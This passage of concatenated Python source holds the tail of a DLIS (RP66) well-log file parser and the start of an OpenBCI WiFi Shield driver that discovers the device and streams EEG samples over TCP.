new_set['type'] = lr_type
new_set['code'] = lr_code
new_set['structure_type'] = lr_structure_type
new_set['template'] = []
new_set['closed'] = False
cls.lrs.get(cls.current_file_number)[cls.current_lr] = new_set
cls.lr_to_object.get(cls.current_file_number)[lr_type] = []
@classmethod
def register_object(cls, object_name):
"""Register a new DLIS Object, with its name.
"""
if not cls.get_logical_records()[-1].get('closed'):
cls.get_logical_records()[-1]['closed'] = True
if cls.objects.get(cls.current_file_number) is None:
cls.objects[cls.current_file_number] = OrderedDict()
cls.objects.get(cls.current_file_number)[object_name] = []
current_lr = cls.get_logical_records()[-1]
cls.object_to_lr.get(cls.current_file_number)[object_name] = current_lr.get('type')
cls.lr_to_object.get(cls.current_file_number).get(current_lr.get('type')).append(object_name)
@classmethod
def get_logical_records(cls, file_number=None):
if file_number is None:
file_number = cls.current_file_number
return list(cls.lrs.get(file_number).values())
@classmethod
def get_logical_record(cls, lr_type, file_number=None):
for lr in cls.get_logical_records(file_number):
if lr.get('type') == lr_type:
return lr
return None
@classmethod
def get_objects_of_type(cls, lr_type, file_number=None):
if file_number is None:
file_number = cls.current_file_number
obj_names = cls.lr_to_object.get(file_number).get(lr_type)
ret_map = OrderedDict()
if not obj_names:
return ret_map
for obj_name in obj_names:
ret_map[obj_name] = cls.objects.get(cls.current_file_number).get(obj_name)
return ret_map
@classmethod
def get_objects_dict_of_type(cls, lr_type, file_number=None):
if file_number is None:
file_number = cls.current_file_number
ret_map = OrderedDict()
objects = cls.get_objects_of_type(lr_type, file_number)
if not objects:
return ret_map
template_list = cls.get_logical_record(lr_type, file_number).get('template')
for obj_name, obj_values in objects.items():
obj_map = OrderedDict()
for idx, value in enumerate(obj_values):
# print 'idx', idx, template_list[idx]
obj_map[template_list[idx].get('name')] = value
ret_map[obj_name] = obj_map
return ret_map
@classmethod
def get_object_values_list(cls, object_name, file_number=None):
"""Given a object name (e.g 0&0&WN or 1&0&RHOB) return its values list.
If file_number is not given, the latest one will be used.
"""
if file_number is None:
file_number = cls.current_file_number
obj_values_list = cls.objects.get(file_number).get(object_name)
return obj_values_list
@classmethod
def get_object_values_dict(cls, object_name, file_number=None):
if file_number is None:
file_number = cls.current_file_number
obj_values_list = cls.get_object_values_list(object_name, file_number)
if obj_values_list is None:
return None
lr_type = cls.object_to_lr.get(file_number).get(object_name)
ret_map = OrderedDict()
for set_map in list(cls.lrs.get(file_number).values()):
if set_map.get('type') == lr_type:
for idx, template in enumerate(set_map.get('template')):
try:
ret_map[template.get('name')] = obj_values_list[idx]
except IndexError:
return ret_map
return ret_map
def _get_SUL(data):
# Getting Storage Unit Label (SUL)
if len(data) != 80 and len(data) != 128:
raise Exception('Input data size not according excepted (Excepted 80 or 120 bytes).')
SUL = OrderedDict()
SUL['Storage unit sequence number'] = data[0:4].decode("utf-8").strip()
SUL['RP66 version and format edition'] = data[4:9].decode("utf-8").strip()
SUL['Storage unit structure'] = data[9:15].decode("utf-8").strip()
if SUL.get('RP66 version and format edition').split('.')[0] == 'V1':
SUL['Maximum visible record length'] = data[15:20].decode("utf-8").strip()
SUL['Storage set identifier'] = data[20:80].decode("utf-8").strip()
elif SUL.get('RP66 version and format edition').split('.')[0] == 'V2':
if len(data) == 80:
raise Exception('DLIS version 2 needs 128 bytes for Storage Unit Label (SUL).')
SUL['Binding edition'] = data[15:19].decode("utf-8").strip()
SUL['Maximum visible record length'] = data[19:29].decode("utf-8").strip()
SUL['Producer organization code'] = data[29:39].decode("utf-8").strip()
SUL['Creation date'] = data[39:50].decode("utf-8").strip()
SUL['Serial number'] = data[50:62].decode("utf-8").strip()
SUL['reserved'] = data[62:68].decode("utf-8").strip()
SUL['Storage set identifier'] = data[68:128].decode("utf-8").strip()
return SUL
class DLISFile(object):
def __init__(self):
RepresentationCodes.start()
# base_path == this floder
base_path = os.path.dirname(os.path.abspath(__file__))
mapping_file = 'DLIS_RP66V1_MAPPING.json'
self.mapping = app.app_utils.read_json_file(
os.path.join(base_path, mapping_file)
)
#
self._clear()
def _clear(self):
#
DLISObjectPool.init_pool()
#
self.SUL = None
self.file_size = -1
self.data = None
self.data_props = None
#
self.file_header = None
self.origin = None
self.parameter = None
self.frame = None
self.channel = None
#
# self.queue = Queue()
#
def get_file_read_percent(self):
if self.file_size == -1:
return 0
return float(self.file.tell()) * 100 / self.file_size
@staticmethod
def is_DLIS_file(filename):
try:
file_ = open(filename, mode='rb')
# Getting Storage Unit Label (SUL)
SUL = _get_SUL(file_.read(128))
file_.close()
if SUL.get('RP66 version and format edition').split('.')[0] != 'V1' \
and SUL.get('RP66 version and format edition').split('.')[0] != 'V2':
return False
return True
except Exception:
return False
def print_logical_file(self, file_index=None, limit=None):
if file_index is None:
file_index = range(len(self.data))
elif file_index == -1:
file_index = range(len(self.data) - 1, len(self.data), 1)
elif file_index >= 0 and file_index < len(self.data):
file_index = range(file_index, file_index + 1, 1)
else:
raise Exception()
if limit is not None:
counter = 1
for idx in file_index:
datum = self.data[idx]
print('\n\nLogical File:', idx)
for object_name, object_dict in datum.items():
print('\n', object_name)
for data_idx, data_values in object_dict.items():
print('\n ', data_idx)
for i, v in enumerate(data_values):
print(' ', list(self.data_props[idx].get(object_name).keys())[i], \
': ', v, list(self.data_props[idx].get(object_name).values())[i].get('UNITS'))
if limit is not None:
if counter == limit:
msg = '\nLimit of ' + str(limit) + ' registers was reached. End of print.'
print(msg)
return
else:
counter += 1
print('\nEnd of print.')
'''
def read(self, filename, callback=None, threading_stop_event=None):
#t = threading.Thread(target=self._read, args=(filename, callback))
#t.start()
#t.join()
p = Process(target=self._read, args=(filename, callback))
p.start()
p.join()
'''
def read(self, filename, callback=None, threading_stop_event=None):
# Clear DLISObjectPool
DLISObjectPool.init_pool()
#
self.filename = filename
# self.callback = callback
self.file = open(self.filename, mode='rb')
self.file_size = os.fstat(self.file.fileno()).st_size
# Getting Storage Unit Label (SUL)
self.SUL = _get_SUL(self.file.read(128))
# print()
# print(self.SUL)
# print()
if self.SUL.get('RP66 version and format edition').split('.')[0] == 'V1':
self.file.seek(80)
elif self.SUL.get('RP66 version and format edition').split('.')[0] != 'V2':
raise Exception('This is not a DLIS File.')
#
self._read_Logical_Records(callback, threading_stop_event)
# self._reading_process = Process(target=self._read_Logical_Records,
# args=(stop_event, 'task'))
# print 'a', self.file.tell()
# self._reading_process.start()
# print 'b', self.file.tell(), self._reading_process.is_alive()
# self._reading_process.join()
# print 'c', self.file.tell(), self._reading_process.is_alive()
#
self.file.close()
#
self._load_file_header_props()
self._load_origin_props()
self._load_parameter_props()
self._load_frame_props()
self._load_channel_props()
#
if threading_stop_event:
if threading_stop_event.is_set():
print('File reading canceled by user.')
else:
self.print_logical_file(-1, 1)
else:
self.print_logical_file(-1, 1)
#
print('\n\nself.data_props')
print(self.data_props)
# TODO: rever self._curves_info
self._curves_info = OrderedDict()
for item_od in self.data_props:
for curve_set_name in list(item_od.keys()):
curve_info_od = item_od[curve_set_name]
curve_set_name = get_actual_objname(curve_set_name)
self._curves_info[curve_set_name] = []
for curve_name, curve_props_od in curve_info_od.items():
curve_actual_name = get_actual_objname(curve_name)
curve_unit = curve_props_od['UNITS'].lower()
self._curves_info[curve_set_name].append(
(curve_actual_name, curve_unit)
)
#
print('\n\nself._curves_info')
print(self._curves_info)
#
# print('\n\nself.data')
# print(self.data)
#
# """
# TODO: rever self._curves_data
self._curves_data = OrderedDict()
for curve_set_name, curves_info_list in self._curves_info.items():
self._curves_data[curve_set_name] = []
for idx in range(len(curves_info_list)):
self._curves_data[curve_set_name].append([])
#
for item_od in self.data:
for iflr_descriptor in list(item_od.keys()):
curve_data_od = item_od[iflr_descriptor]
curve_set_name = get_actual_objname(iflr_descriptor)
for curves_data_list in list(curve_data_od.values()):
for idx, value in enumerate(curves_data_list):
# print('idx val:', idx, value)
self._curves_data[curve_set_name][idx].append(value)
#
for curves_data_list in list(self._curves_data.values()):
for idx in range(len(curves_data_list)):
curves_data_list[idx] = np.asarray(curves_data_list[idx])
"""
print('\n\nself._curves:')
for curve_set_name, curves_data_list in self._curves_data.items():
print()
print('CURVE_SET:', curve_set_name)
print()
for idx in range(len(curves_data_list)):
print()
print(self._curves_info[curve_set_name][idx])
print(self._curves_data[curve_set_name][idx])
"""
def _load_file_header_props(self):
self.file_header = self._get_logical_record_props('FILE-HEADER')
def _load_origin_props(self):
self.origin = OrderedDict()
origin_od = self._get_logical_record_props('ORIGIN')
# id = 0 have all info we really need. Other are used when there are
# copies as stated by RP66 V1.
if not origin_od:
return
# print('\n\n\norigin_od:', origin_od)
# print('\n\n\n')
try:
obj_name, obj_map = list(origin_od.items())[0]
print(obj_name)
print(obj_map)
for key, value in obj_map.items():
# print('kv:', key, value)
self.origin[key] = value
except:
raise
# print('FIM _load_origin_props')
def _load_parameter_props(self):
self.parameter = OrderedDict()
params_od = self._get_logical_record_props('PARAMETER')
if not params_od:
return
for obj_name, obj_dict in params_od.items():
self.parameter[get_actual_objname(obj_name)] = obj_dict['VALUES']
def _load_frame_props(self):
self.frame = OrderedDict()
frame_od = self._get_logical_record_props('FRAME')
if not frame_od:
return
for obj_name, obj_dict in frame_od.items():
frame_obj_od = OrderedDict()
self.frame[get_actual_objname(obj_name)] = frame_obj_od
frame_obj_od['CHANNELS'] = []
for chan_obj_name in obj_dict.pop('CHANNELS'):
frame_obj_od['CHANNELS'].append(get_actual_objname(chan_obj_name))
for key, value in obj_dict.items():
frame_obj_od[key] = value
def _load_channel_props(self):
self.channel = OrderedDict()
channel_od = self._get_logical_record_props('CHANNEL')
if not channel_od:
return
for obj_name, obj_dict in channel_od.items():
self.channel[get_actual_objname(obj_name)] = obj_dict['UNITS']
def _get_logical_record_props(self, lr_type):
try:
lr_props = OrderedDict()
lr_od = DLISObjectPool.get_objects_dict_of_type(lr_type)
if not lr_od:
return lr_props
for obj_name, obj_map in lr_od.items():
obj_lr_od = OrderedDict()
lr_props[obj_name] = obj_lr_od
for key, value in obj_map.items():
if isinstance(value, list) and len(value) == 1:
obj_lr_od[key] = value[0]
else:
obj_lr_od[key] = value
except Exception as e:
print('ERROR:', e)
lr_props = OrderedDict()
#
# print()
# print(lr_type)
# for obj_name, obj_map in lr_props.items():
# print(' ', obj_name)
# for key, value in obj_map.items():
# print(' ', key, value)
# print()
#
#
return lr_props
'''
def stop_reading(self):
if self._reading_process.is_alive():
self._reading_process.terminate()
self._clear
self.file.close()
'''
def _read_Logical_Records(self, callback=None, threading_stop_event=None):
print('\n\n\nENTROU _read_Logical_Records')
print('self.data_props:', self.data_props)
print('\n\n\n')
lr_data = b''
current_obj_name = None
i = 0
while self.file.tell() < self.file_size:
if threading_stop_event:
if threading_stop_event.is_set():
break
# i += 1
if callback:
callback(self.get_file_read_percent())
# "Visible Record consists of Visible Envelope Data plus one
# or more Logical Record Segments"
# VED - Visible Envelope Data
VED = OrderedDict()
ved_data = self.file.read(self.mapping.get('VED').get('size'))
vr_offset = 0
for item in self.mapping.get('VED').get('data'):
vr_offset, value = get_from_list(ved_data, vr_offset, item.get('code'))
# value = value.decode("utf-8")
if item.get('name') == 'The value FF16':
if value != 255:
msg = 'Expected value FF16 on byte ' + str(self.file.tell() - 2)
raise Exception(msg)
else:
VED[item.get('name')] = value
# elif item.get('name') == 'Format version':
# if str(value) != self.SUL.get('RP66 version and format edition').split('.')[0].split('V')[1]:
# raise Exception('Version on Visible Record is not the same on Storage Unit Label.')
# Obtaing Visible Record end offset
end_vr_offset = self.file.tell() + VED.get('Visible Record Length') - 4
# Getting Logical Record Segments from Visible Record
# A Logical Record Segment is composed of four mutually disjoint parts:
# (1) a Logical Record Segment Header,
# (2) an optional Logical Record Segment Encryption Packet,
# (3) a Logical Record Segment Body, and
# (4) an optional Logical Record Segment Trailer.
print('\n\n\n002 _read_Logical_Records')
print('self.data_props:', self.data_props)
print('\n\n\n')
while self.file.tell() < end_vr_offset:
# (1) Logical Record Segment Header
lrs_header = OrderedDict()
lrs_header_data = self.file.read(self.mapping.get('LRSH').get('size'))
lrs_header_offset = 0
for item in self.mapping.get('LRSH').get('data'):
lrs_header_offset, value = get_from_list(lrs_header_data, lrs_header_offset, item.get('code'))
# value = value.decode("utf-8")
lrs_header[item.get('name')] = value
lrs_body_size = lrs_header.get('Logical Record Segment Length') - 4
# Calculating Logical Record Segment Trailer (LRST) size
lrst_size = 0
# Trailing Length
if lrs_header.get('Logical Record Segment Attributes')[6]:
lrst_size += 2
# Checksum
if lrs_header.get('Logical Record Segment Attributes')[5]:
lrst_size += 2
# Padding
if lrs_header.get('Logical Record Segment Attributes')[7]:
tmp_offset = self.file.tell()
self.file.seek(self.file.tell() + lrs_body_size - (lrst_size + 1))
_, pad_count = get_from_list(self.file.read(1), 0, 15)
self.file.seek(tmp_offset)
else:
pad_count = 0
lrst_size += pad_count
# (2) Logical Record Segment Encryption Packet (LRSEP)
if lrs_header.get('Logical Record Segment Attributes')[3] or \
lrs_header.get('Logical Record Segment Attributes')[4]:
raise Exception('Logical Record is encrypted')
#
# (3) Logical Record Segment Body (LRSB)
lr_data += self.file.read(lrs_body_size - lrst_size)
# If LRSB has not Successor than the Logical Record (LR)
# is ready to be processed. Otherwise another LRSB
# will be appended to LR.
if not lrs_header.get('Logical Record Segment Attributes')[2]:
# It's time to work on logical record
lr_data_offset = 0
while lr_data_offset < len(lr_data):
# Explicitly Formatted Logical Records (EFLR)
if lrs_header.get('Logical Record Segment Attributes')[0] == 1:
# print("EFLR")
role, definition = self.get_EFLR_process_descriptor(
lr_data[lr_data_offset:lr_data_offset + 1])
lr_data_offset += 1
if role == 'ABSATR':
if not DLISObjectPool.get_logical_records()[-1].get('closed'):
DLISObjectPool.get_logical_records()[-1].get('template').append(None)
else:
DLISObjectPool.get_object_values_list(current_obj_name).append(None)
continue
map_ = OrderedDict()
for key, (has_key, code) in definition.items():
if has_key:
if code:
lr_data_offset, value = get_from_list(lr_data, lr_data_offset, code)
# value = value.decode("utf-8")
# print('code:', key, value, role)
# print()
map_[key] = value
else:
# Reading Value
if key == 'V':
if not map_.get('C'):
map_['C'] = 1
values = []
# Firstly, trying to use value code
if map_.get('R') is not None:
code = map_.get('R')
else:
pos = len(DLISObjectPool.get_object_values_dict(current_obj_name))
template = DLISObjectPool.get_logical_records()[-1].get('template')[pos]
# Secondly, trying to use template code for value
if template.get('code') is not None:
code = template.get('code')
# Otherwise, use default code recommended by RP66_V1
else:
code = 19
for i in range(map_.get('C')):
lr_data_offset, value = get_from_list(lr_data, lr_data_offset, code)
if isinstance(value, str):
value = value.strip()
elif code == 23:
value = get_objname_from_tuple(value)
values.append(value)
# print('not code: V', values, role)
map_['V'] = values
else:
raise Exception()
if role == 'SET':
# Reseting data_props used in IFLR Frame Data
if map_.get('T') == 'FILE-HEADER':
# print('FILE-HEADER')
if self.data_props is None:
self.data_props = []
if self.data is None:
self.data = []
print('FILE-HEADER:', len(self.data_props))
# Appending new 'spaces' for log properties
# and for log data. We will have one list
# of properties and one dict of data for
# each DLIS Logical File.
# Frame Data Prop list will be compiled
# at logical file first IFLR.
# Data dict will be constructed on every IFLR frame data
# """
self.data_props.append(None)
# """
self.data.append(OrderedDict())
DLISObjectPool.register_logical_record(
1,
map_.get('T'),
lrs_header.get('Logical Record Type')
)
current_obj_name = None
elif role == 'ATTRIB':
if not DLISObjectPool.get_logical_records()[-1].get('closed'):
new_template = OrderedDict()
new_template['name'] = map_.get('L')
new_template['unit'] = map_.get('U')
new_template['code'] = map_.get('R')
DLISObjectPool.get_logical_records()[-1].get('template').append(new_template)
else:
# print('current_obj_name:', current_obj_name, map_.get('V'))
DLISObjectPool.get_object_values_list(current_obj_name).append(map_.get('V'))
elif role == 'OBJECT':
current_obj_name = get_objname_from_tuple(map_.get('N'))
DLISObjectPool.register_object(current_obj_name)
else:
# DLISObjectPool.printa()
# print()
# print(role, definition, current_obj_name, self.file.tell())
raise Exception()
# Indirectly Formatted Logical Records (IFLR)
else:
# print("IFLR")
lr_data_offset, obj_name = get_from_list(lr_data, lr_data_offset, 23)
iflr_descriptor = get_objname_from_tuple(obj_name)
# If LRT for IFLR is 127, then we have a EOD -> Nothing to do!
if lrs_header.get('Logical Record Type') == 127:
if lr_data_offset == len(lr_data):
break
else:
raise Exception('ERROR: Found a IFLR EOD with LR data to be read.')
if self.data_props[-1] is None:
print('\n\n\n')
print('self.data_props[-1] is None')
print('\n\n\n')
print('self.data_props:', self.data_props)
print('\n\n\n')
channel_objects = DLISObjectPool.get_objects_dict_of_type('CHANNEL')
print('\nchannel_objects:', channel_objects)
frame_objects = DLISObjectPool.get_objects_dict_of_type('FRAME')
print('\nframe_objects:', frame_objects)
frame_data_prop = OrderedDict()
self.data_props[-1] = frame_data_prop
print('\n\nself.data_props[-1]:', self.data_props[-1])
print('\n\n\n')
#
for frame_obj_name, frame_obj_props in frame_objects.items():
frame_props = OrderedDict()
frame_data_prop[frame_obj_name] = frame_props
for idx, channel_name in enumerate(frame_obj_props.get('CHANNELS')):
channel_props = OrderedDict()
frame_props[channel_name] = channel_props
for frame_key, frame_value in frame_obj_props.items():
if frame_key != 'CHANNELS': # No need to insert channel again
try:
frame_value = frame_value[idx]
except Exception:
frame_value = None
channel_props[frame_key] = frame_value
for channel_key, channel_value in channel_objects.get(channel_name).items():
if channel_key == 'AXIS' and channel_value is not None:
axis_props = OrderedDict()
axis_objects = DLISObjectPool.get_objects_dict_of_type('AXIS')
print('\naxis_objects:', axis_objects)
for axis_object_name in channel_value:
axis_props[axis_object_name] = OrderedDict()
for axis_key, axis_value in axis_objects.get(
axis_object_name).items():
if isinstance(axis_value, list):
if len(axis_value) == 1:
axis_value = axis_value[0]
axis_props.get(axis_object_name)[axis_key] = axis_value
channel_value = axis_props
elif isinstance(channel_value, list):
if len(channel_value) == 1:
channel_value = channel_value[0]
channel_props[channel_key] = channel_value
# TODO: Rever abaixo, reordenando o self.data
while lr_data_offset < len(lr_data):
if self.data[-1].get(iflr_descriptor) is None:
self.data[-1][iflr_descriptor] = OrderedDict()
lr_data_offset, idx = get_from_list(lr_data, lr_data_offset, 18)
list_ = []
self.data[-1].get(iflr_descriptor)['#' + str(idx)] = list_
if self.data_props[-1].get(iflr_descriptor):
for channel_name, channel_props in self.data_props[-1].get(iflr_descriptor).items():
code = channel_props.get('REPRESENTATION-CODE')
if channel_props.get('DIMENSION') == 1:
lr_data_offset, value = get_from_list(lr_data, lr_data_offset, code)
else:
value = []
for i in range(channel_props.get('DIMENSION')):
lr_data_offset, v = get_from_list(lr_data, lr_data_offset, code)
value.append(v)
list_.append(value)
# End of IFLR
# End of Logical Record processing - Clearing lr_data
lr_data = b''
# (4) Logical Record Segment Trailer (LRST)
# Bypassing pad bytes
if pad_count:
self.file.seek(pad_count, 1)
# Bypassing checksum
if lrs_header.get('Logical Record Segment Attributes')[5]:
self.file.seek(2, 1)
# Bypassing trailing length
if lrs_header.get('Logical Record Segment Attributes')[6]:
self.file.seek(2, 1)
else:
if callback:
callback(self.get_file_read_percent())
# percent = float("{0:.2f}".format(self.get_file_read_percent()))
# msg = 'Read: ' + str(percent) + '%'
# print msg
# for fileno, map_ in DLISObjectPool.objects.items():
# print()
# print('file number:', fileno)
# lrs = DLISObjectPool.get_logical_records(fileno)
# print()
# for lr in lrs:
# type_name = lr.get('type')
# print(' ', type_name)
# objs = DLISObjectPool.get_objects_dict_of_type(type_name)
# for obj_name, obj_map in objs.items():
# print(' ', obj_name)
# for k, v in obj_map.items():
# print(' ', k, v)
# print()
# print()
# print()
# print('ending...')
# for k, v in map_.items():
# print(' ', k, v)
def get_EFLR_process_descriptor(self, descriptor_data):
if len(descriptor_data) != 1:
raise Exception()
v1 = ord(descriptor_data)
result = bin(v1)[2:].zfill(8)
if result[0:3] == '000':
role = 'ABSATR'
elif result[0:3] == '001':
role = 'ATTRIB'
elif result[0:3] == '010':
role = 'INVATR'
elif result[0:3] == '011':
role = 'OBJECT'
elif result[0:3] == '100':
role = 'reserved'
elif result[0:3] == '101':
role = 'RDSET'
elif result[0:3] == '110':
role = 'RSET'
elif result[0:3] == '111':
role = 'SET'
attr = OrderedDict()
if role in ['SET', 'RSET', 'RDSET']:
if result[3:4] == '1':
attr['T'] = (True, 19)
else:
attr['T'] = (False, None)
if result[4:5] == '1':
attr['N'] = (True, 19)
else:
attr['N'] = (False, None)
elif role == 'OBJECT':
if result[3:4] == '1':
attr['N'] = (True, 23)
else:
attr['N'] = (False, None)
elif role in ['ATTRIB', 'INVATR']:
if result[3:4] == '1':
attr['L'] = (True, 19)
else:
attr['L'] = (False, None)
if result[4:5] == '1':
attr['C'] = (True, 18)
else:
attr['C'] = (False, None)
if result[5:6] == '1':
attr['R'] = (True, 15)
else:
attr['R'] = (False, 19)
if result[6:7] == '1':
attr['U'] = (True, 27)
else:
attr['U'] = (False, None)
if result[7:8] == '1':
attr['V'] = (True, None)
else:
attr['V'] = (False, None)
return role, attr
# Definition of Characteristics and Component Format for Set,
# Redundant Set, and Replacement Set Components
"""
000 ABSATR Absent Attribute
001 ATTRIB Attribute
010 INVATR Invariant Attribute
011 OBJECT Object
100 reserved -
101 RDSET Redundant Set
110 RSET Replacement Set
111 SET Set
"""
if __name__ == '__main__':
# app = wx.App(False)
filename = 'DLISOut_TMT001D.dlis'
# filename = 'qqcoisa.dlis'
# filename = 'Sample2.dlis'
# filename = '57-438A_1_1.dlis'
# filename = '311-U1325A_ecoscope.dlis'
dlis = DLISFile()
dlis.read(filename)
|
wifi_origin.py
|
"""
Core OpenBCI object for handling connections and samples from the WiFi Shield
Note that the LIB will take care on its own to print incoming ASCII messages if any (FIXME, BTW).
EXAMPLE USE:
def handle_sample(sample):
print(sample.channels_data)
wifi = OpenBCIWifi()
wifi.start(handle_sample)
TODO: Cyton/Ganglion JSON
TODO: Ganglion Raw
TODO: Cyton Raw
"""
import asyncore
import atexit
import json
import logging
import re
import socket
import timeit
import threading
try:
import urllib2
except ImportError:
import urllib
import requests
import xmltodict
import numpy as np
from openbci.utils import k, ParseRaw, OpenBCISample, ssdp
SAMPLE_RATE = 0 # Hz
'''
#Commands for in SDK
command_stop = "s";
command_startBinary = "b";
'''
class OpenBCIWiFi(object):
"""
Handle a connection to an OpenBCI wifi shield.
Args:
ip_address: The IP address of the WiFi Shield, "None" to attempt auto-detect.
shield_name: The unique name of the WiFi Shield, such as `OpenBCI-2AD4`, will use SSDP to get IP address still,
if `shield_name` is "None" and `ip_address` is "None", will connect to the first WiFi Shield found using SSDP
sample_rate: The sample rate to set the attached board to. If the sample rate picked is not a sample rate the attached
board can support, i.e. you send 300 to Cyton, then error will be thrown.
log:
timeout: in seconds, disconnect / reconnect after a period without new data -- should be high if impedance check
max_packets_to_skip: will try to disconnect / reconnect after too many packets are skipped
"""
def __init__(self, ip_address='192.168.4.1', shield_name=None, sample_rate=250, log=True, timeout=3,
max_packets_to_skip=20, latency=10000, high_speed=True, ssdp_attempts=5,
num_channels=8):
# these one are used
self.daisy = True
self.gains = None
self.high_speed = high_speed
self.impedance = False
self.ip_address = ip_address
self.latency = latency
self.log = log # print_incoming_text needs log
self.max_packets_to_skip = max_packets_to_skip
self.num_channels = num_channels
self.sample_rate = sample_rate
self.shield_name = shield_name
self.ssdp_attempts = ssdp_attempts
self.streaming = False
self.timeout = timeout
self.timer_start = 0
self.timer_end = 0
# might be handy to know API
self.board_type = "none"
# number of EEG channels
self.eeg_channels_per_sample = 0
self.read_state = 0
self.log_packet_count = 0
self.packets_dropped = 0
self.time_last_packet = 0
if self.log:
print("Welcome to OpenBCI Native WiFi Shield Driver - Please contribute code!")
self.local_ip_address = self._get_local_ip_address()
# Intentionally bind to port 0
self.local_wifi_server = WiFiShieldServer(self.local_ip_address, 80)
self.local_wifi_server_port = self.local_wifi_server.socket.getsockname()[1]
#self.local_wifi_server_1 = WiFiShieldServer(self.local_ip_address, 100)
#self.local_wifi_server_port_1 = self.local_wifi_server_1.socket.getsockname()[1]
if self.log:
print("Opened socket on %s:%d" % (self.local_ip_address, self.local_wifi_server_port))#ip and port
'''
self.local_wifi_server.socket.setblocking(1)
while True:
clientsocket, address = self.local_wifi_server.socket.accept()
data = clientsocket.recv(1)
if not data:
pass
else:
print("First client send: " + str(data))
clientsocket.close()
break
self.timer_start = timeit.default_timer()
self.thread = threading.Thread(target=self.handler, args=(1,))
self.thread.start()
'''
if ip_address is None:#try to find suitable ip address
for i in range(ssdp_attempts):
try:
self.find_wifi_shield(wifi_shield_cb=self.on_shield_found)
break
except OSError:
# Try again
if self.log:
print("Did not find any WiFi Shields")
else:
self.on_shield_found(ip_address)
def handler(self,num):
print('start doing work of thread')
if self.log:
print("Opened socket on %s:%d" % (self.local_ip_address, self.local_wifi_server_port_1))#ip and port
self.local_wifi_server_1.socket.setblocking(1)
while True:
clientsocket, addr = self.local_wifi_server_1.socket.accept()
data = clientsocket.recv(1)
if data:
print("Second client send: " + str(data))
self.stop()
clientsocket.close()
print('finish thread')
break
def on_shield_found(self, ip_address):
self.ip_address = ip_address
self.connect()
# Disconnects from board when terminated
atexit.register(self.disconnect)
def loop(self):
asyncore.loop()
def _get_local_ip_address(self):
"""
Gets the local ip address of this computer
@returns str Local IP address
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
local_ip_address = s.getsockname()[0]
s.close()
return local_ip_address
def getBoardType(self):
""" Returns the version of the board """
return self.board_type
def setImpedance(self, flag):
""" Enable/disable impedance measure """
self.impedance = bool(flag)
def connect(self):
""" Connect to the board and configure it. Note: recreates various objects upon call. """
if self.ip_address is None:
raise ValueError('self.ip_address cannot be None')
if self.log:
print("Init WiFi connection with IP: " + self.ip_address)
"""
Docs on these HTTP requests and more are found:
https://app.swaggerhub.com/apis/pushtheworld/openbci-wifi-server/1.3.0
"""
#requests.get->board
res_board = requests.get("http://%s/board" % self.ip_address)
if res_board.status_code == 200:
board_info = res_board.json()
if not board_info['board_connected']:
raise RuntimeError("No board connected to WiFi Shield. To learn how to connect to a Cyton or Ganglion visit http://docs.openbci.com/Tutorials/03-Wifi_Getting_Started_Guide")
self.board_type = board_info['board_type']
self.eeg_channels_per_sample = board_info['num_channels']
if self.log:
print("Connected to %s with %s channels" % (self.board_type, self.eeg_channels_per_sample))#cyton , 16
self.gains = None
if self.board_type == k.BOARD_CYTON:
self.gains = [24, 24, 24, 24, 24, 24, 24, 24]
self.daisy = False
elif self.board_type == k.BOARD_DAISY:
self.gains = [24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24]
self.daisy = True
elif self.board_type == k.BOARD_GANGLION:
self.gains = [51, 51, 51, 51]
self.daisy = False
self.local_wifi_server.set_daisy(daisy=self.daisy)
self.local_wifi_server.set_parser(ParseRaw(gains=self.gains, board_type=self.board_type))
if self.high_speed:
output_style = 'raw'
else:
output_style = 'json'
#requests.post: HTTP 請求 tcp
res_tcp_post = requests.post("http://%s/tcp" % self.ip_address,
json={
'ip': self.local_ip_address,
'port': self.local_wifi_server_port,
'output': output_style,
'delimiter': True,
'latency': self.latency
})
#status code表明一個HTTP要求是否已經被完成
if res_tcp_post.status_code == 200:#請求成功 已傳送message body 內的resource describing the result of the action
tcp_status = res_tcp_post.json()
print('tcp_status',tcp_status)
if tcp_status['connected']:
if self.log:
print("WiFi Shield to Python TCP Socket Established")#TCP Socket
else:
raise RuntimeWarning("WiFi Shield is not able to connect to local server. Please open an issue.")
def init_streaming(self):
""" Tell the board to record like crazy. """
# used to request data from a specified resource
res_stream_start = requests.get("http://%s/stream/start" % self.ip_address)
if res_stream_start.status_code == 200:
self.streaming = True
self.packets_dropped = 0
self.time_last_packet = timeit.default_timer()
else:
raise EnvironmentError("Unable to start streaming. Check API for status code %d on /stream/start" % res_stream_start.status_code)
def find_wifi_shield(self, shield_name=None, wifi_shield_cb=None):
"""Detects Ganglion board MAC address -- if more than 1 around, will select first. Needs root privilege."""
if self.log:
print("Try to find WiFi shields on your local wireless network")
print("Scanning for %d seconds nearby devices..." % self.timeout)
list_ip = []
list_id = []
found_shield = False
def wifi_shield_found(response):
res = requests.get(response.location, verify=False).text
device_description = xmltodict.parse(res)
cur_shield_name = str(device_description['root']['device']['serialNumber'])
cur_base_url = str(device_description['root']['URLBase'])
cur_ip_address = re.findall(r'[0-9]+(?:\.[0-9]+){3}', cur_base_url)[0]
list_id.append(cur_shield_name)
list_ip.append(cur_ip_address)
found_shield = True
if shield_name is None:
print("Found WiFi Shield %s with IP Address %s" % (cur_shield_name, cur_ip_address))
if wifi_shield_cb is not None:
wifi_shield_cb(cur_ip_address)
else:
if shield_name == cur_shield_name:
if wifi_shield_cb is not None:
wifi_shield_cb(cur_ip_address)
ssdp_hits = ssdp.discover("urn:schemas-upnp-org:device:Basic:1", timeout=self.timeout, wifi_found_cb=wifi_shield_found)
nb_wifi_shields = len(list_id)
if nb_wifi_shields < 1:
print("No WiFi Shields found ;(")
raise OSError('Cannot find OpenBCI WiFi Shield with local name')
if nb_wifi_shields > 1:
print(
"Found " + str(nb_wifi_shields) +
", selecting first named: " + list_id[0] +
" with IPV4: " + list_ip[0])
return list_ip[0]
def wifi_write(self, output):
"""
Pass through commands from the WiFi Shield to the Carrier board
:param output:
:return:
"""
res_command_post = requests.post("http://%s/command" % self.ip_address,
json={'command': output})
if res_command_post.status_code == 200:
ret_val = res_command_post.text
if self.log:
print(ret_val)
return ret_val
else:
if self.log:
print("Error code: %d %s" % (res_command_post.status_code, res_command_post.text))
raise RuntimeError("Error code: %d %s" % (res_command_post.status_code, res_command_post.text))
def getSampleRate(self):
return self.sample_rate
def getNbEEGChannels(self):
"""Will not get new data on impedance check."""
return self.eeg_channels_per_sample
def start_streaming(self, callback, lapse=-1):
"""
